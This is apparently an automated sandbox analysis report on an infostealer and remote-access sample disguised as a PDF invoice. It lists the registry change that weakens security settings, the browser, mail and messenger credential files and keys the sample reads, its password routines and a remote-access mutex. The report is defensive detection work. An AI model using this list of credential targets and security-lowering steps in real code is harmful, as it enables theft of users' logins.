Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 29_2_004082CD
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Code function: 0_2_004060E3 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_004060E3
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Windows\SysWOW64\reg.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000010.00000002.3682803915.00000000027FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3682803915.000000000280F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Nubilum.exe PID: 7688, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: ESMTPPassword 29_2_004033F0
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 29_2_00402DB3
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 29_2_00402DB3
Source: Yara match File source: Process Memory Space: Nubilum.exe PID: 7688, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Nubilum.exe PID: 1912, type: MEMORYSTR

Remote Access Functionality

barindex
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-7CSH4D Jump to behavior
Source: Yara match File source: 00000010.00000002.3682803915.00000000027FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3682803915.000000000280F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Nubilum.exe PID: 7688, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs